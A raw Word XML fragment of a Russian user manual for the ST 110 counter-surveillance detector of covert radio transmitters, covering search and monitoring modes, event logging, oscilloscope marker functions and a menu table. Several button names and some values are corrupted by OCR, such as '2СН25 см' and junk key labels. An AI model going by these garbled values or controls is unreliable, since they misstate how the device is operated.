        <w:t>чувствительности шкал индикации:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>«И» — низкая, вся шкала 55дБ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>«С» — средняя, вся шкала 35dB,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>«В» — высокая, вся шкала 1 5dB.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>6.4.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>Работа в режиме ПОИСК</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:lastRenderedPageBreak/>
        <w:t>Установите порог индикации. Эту операцию следует производить в одном из ближайших, к проверяемому, помещений в котором уровень фона существенно не отличается от уровня в проверяемом помещении, а установка РТС нецелесообразна. Нельзя проводить установку порога непосредственно в проверяемом помещении, так как при функционировании в нем уже размещенного РТС , уровень его радиоизлучения будет определен как «нулевой».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>При приближении ST 1 10 к РТС, в зависимости от частоты и вида сигнала будет увеличивается количество</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>■ окрашенных секторов индикатора уровня (красный — преобладающая импульсная составляющая в сигнале, синий - преобладающая постоянная).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Данная трактовка сигналов достаточно условна и реализована исключительно для удобства работы с ST 1 1 0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Поиск РТС осуществляется путем планомерного обхода помещения (объекта) с движением вдоль стен и обследованием мебели и других, расположенных в нем, предметов. При обходе антенну ST110 целесообразно держать на расстоянии не более 2СН25 см от обследуемых поверхностей и, ориентируя ее в разных плоскостях, добиваться максимального уровня сигнала. В условиях крупного города и характерной для него сложной сигнально-помеховой обстановки дальность обнаружения маломощных РТС редко составляет более полуметра. В условиях пригородной зоны или сельской местности она может возрастать до нескольких метров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>В случае если горят все сегменты шкалы индикатора уровня, а местонахождение РТС не выявлено последовательно уменьшите чувствительность шкал индикации («В» — «С» — «И») и /или установите нулевой порог относительно данного уровня сигнала (кнопка ZERO). Повторяйте данные действие до точной локализации РТС.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>5i =</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Необходимо отметить, что распространение высокочастотных радиосигналов в условиях железобетонного здания носит неопределенный характер. Это может проявляться в несоответствии индикации уровня сигнала и истинным расстоянием до РТС (эффект переотражения радиоволн).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Индикация идентифицированных цифровых стандартов передачи данных обеспечивается в один момент времени только одного вида сигнала. В случае наличия, в месте проведения работ, нескольких источников различных стандартов их идентификация может быть затруднена. В этом случае рекомендуется отключить легальные источники излучения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Для акустического контроля, на головные телефоны или встроенный излучатель, выводится продетектированный амплитудным детектором сигнал.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Для снижения влияния на работу изделия сигналов с частотами выше 900 МГц (в основном это сигналы базовых станции GSM, DECT и Wi-Fi) включите фильтр нижних частот (См. п. 6.7 ТАБЛИЦА 4). Подключение фильтра подтверждается индикацией знака «Ф» в правом верхнем углу дисплея.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>6.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>РЕЖИМ МОНИТОРИНГ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>6.5.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>Индикация</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Вид экрана в данном режиме, при первом включении, показан на рис. 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>6.5.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>Работа в режиме МОНИТОРИНГ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t xml:space="preserve">Первые пять секунд, после перехода в данный режим, будет наблюдаться обратный пятисекундный отсчет в правом верхнем углу индикатора. Этот период времени предназначен для измерения пикового уровня </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">электромагнитного поля. Данные измерений служат базисом для автоматической установки относительного уровня тревоги. Изменение </w:t>
      </w:r>
      <w:r w:rsidR="002C1237">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251623936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>86360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>730250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3751580" cy="3070225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="208" name="Рисунок 3" descr="Описание: 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mage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1580" cy="307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CAF">
        <w:t>данного значения, производится из МЕНЮ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Для использования расширенных критериев установки уровня тревоги воспользуйтесь программой «ST 1 1 0 Analyzer».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Правильность выбора определяется экспериментально, исходя из необходимой дальности обнаружения и помеховой обстановки с использованием легальных источников радиоизлучения (сотовый телефон, радиостанцию и т.п.) и учетом навыков полученных при работе в режиме «ПОИСК».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>В случае превышения сигналом установленного порога на экране появится полноэкранная надпись «ALARM» (тревога).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>■</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>Для</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>предотвращения</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>хаотичного</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>заполнения</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>протокола</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>событий,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>при</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>проведении</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>подготовительных</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>мероприятий, по умолчанию установлено запрещение записи в ПРОТОКОЛ СОБЫТИИ (знак «—»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>в поз.З). Разрешение записи осуществляется через МЕНЮ (См. п. 6.7 Таблица 2). При выборе разрешения записи проконтролируйте появление в поз.1 0 счетчика событий «ООО» и мигание надписи МОНИТОР. Это будет означать, что при выполнении условий тревоги информация о событии будет фиксироваться в энергонезависимой памяти ST 1 1 0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>События за один сеанс мониторинга записываются в отдельный банк. Всего банков 9. Банк под номером 1 всегда имеет самые новые события, под номером 9 самые старые. При заполнении всех банков, события из банка 9 теряются. Максимальное число событий в одном банке 999. Максимальное число событий во всех банках 4096.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Минимальное время между двумя однотипными событиями составляет 1 сек (изменение данного значения производится из МЕНЮ). Эти события будут зафиксированы в двух записях протокола. При условии появления второго события (в одном частотном диапазоне) в период времени менее 1 сек, оно не будет определено как новое событие. Фиксироваться будет увеличение длительности первого события.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:t>В режиме МОНИТОРИНГ обеспечена возможность автоматического включения/выключения изделия по расписанию, задаваемого в подменю «СИСТЕМА» — Таблица 5. Для использования данной возможности необходимо предварительно установить часы реального времени. Необходимо помнить, что при выключении изделия посредством выключателя питания заданные значения времени будут обнулены.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251624960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1457960</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3232150" cy="3483610"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="207" name="Рисунок 4" descr="Описание: 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image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150" cy="348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tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251625984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>874395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>144780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4145915" cy="3362960"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="206" name="Рисунок 6" descr="Описание: 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image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915" cy="336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C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Ручной выбор значения вертикальной развертки осуществляется последовательным нажатием на кнопку GED (символ «Р» в поз 1.). Выбор осуществляется между относительными значениями от 1 до 7.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Выбор значения горизонтальной развертки осуществляется кнопками |</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:tab/>
        <w:t>между</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:t>значениями 2, 4, 8, 1 6 и</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 32 мс.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Замораживание изображения осциллограммы происходит при нажатии на кнопкуГм|!'и |с появлением надписи на нижней строке дисплея «марк». Возобновление динамической индикации осуществляется нажатием на кнопку СЮ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>При повторных нажатиях на кнопку | M|FU | происходит переключение между тремя подрежимами маркерных измерений: «марк», «время» и «сдвиг». Из этих 3-х подрежимов нажатием на кнопку Г 2I можно перейти в дополнительный подрежим «ноль». Индикация подрежимов в нижней строке дисплея.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:lastRenderedPageBreak/>
        <w:t>В подрежиме «марк» осуществляется замораживание просматриваемого временного отрезка длительностью, определенной в поз. с возможностью проведения маркерных измерений. Это подтверждает, расположенное в нижней части экрана, надпись «марк» и относительное численное значение положения маркера (вертикальная белая линия) на временной шкале.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>В подрежиме «время» обеспечивается возможность изменения значения горизонтальной развертки для замороженного изображения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>В подрежиме «сдвиг» обеспечивается «прокрутка» всего запомненного временного отрезка кнопками |</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Т | и | Т~ I в пределах 32 мс.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Нажатием на кнопку</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Г любого подрежима маркерных измерений можно провести измерение любого видимого временного отрезка на дисплее. При этом происходит переход в подрежим «ноль» и обнуляется маркерное значение. Кнопками PF1 и РП можно осуществить перемещение маркера относительно «нулевого» значения с соответствующей индикацией численного значения измеряемого временного отрезка в нижней части дисплея. Выход из п</w:t>
      </w:r>
      <w:r>
        <w:t>одрежима «ноль» нажатием кнопки</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Выход в режим «Осциллограф» из подрежимов маркерных изм</w:t>
      </w:r>
      <w:r>
        <w:t>ерений нажатием на кнопку Г</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Надо отметить, что при входе в режим маркерных измерений происходит запоминание (замораживание) осциллограммы длительностью 32 мс и имеющей 5120 отсчетов. Чтобы производить детальный анализ такой осциллограммы можно воспользоваться предлагаемыми подрежимами «время», «сдвиг» и «ноль».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Выход из режима «Осциллограф» осуществляется нажатием на кнопкуГ |.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0"/>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>6.8 МЕНЮ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Вход в МЕНЮ осуществляется нажатием кнопки У |.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Пункты МЕНЮ приведены в Таблице 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00C97CAF" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Выбор нужного пункта осуществляется кнопками ГП</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> . Подтверждение выбора — |</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97CAF">
        <w:t>|.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:r w:rsidRPr="00C97CAF">
        <w:t>Возвращение в предыдущий пункт — |  |.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2845"/>
        <w:gridCol w:w="6197"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Осциллограф</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197"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Вход в режим ОСЦИЛЛОГРАФ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Диапазон</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197"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Таблица 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Монитор</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197"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 xml:space="preserve">Таблица </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD0245">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Протокол</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197"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Таблица 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
            <w:r w:rsidRPr="00DD0245">
              <w:t>Система</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6197"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Таблица 6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00DD0245" w:rsidTr="00B45DB0">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="20"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2845"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r w:rsidRPr="00DD0245">
              <w:t>Самописец</w:t>
            </w:r>
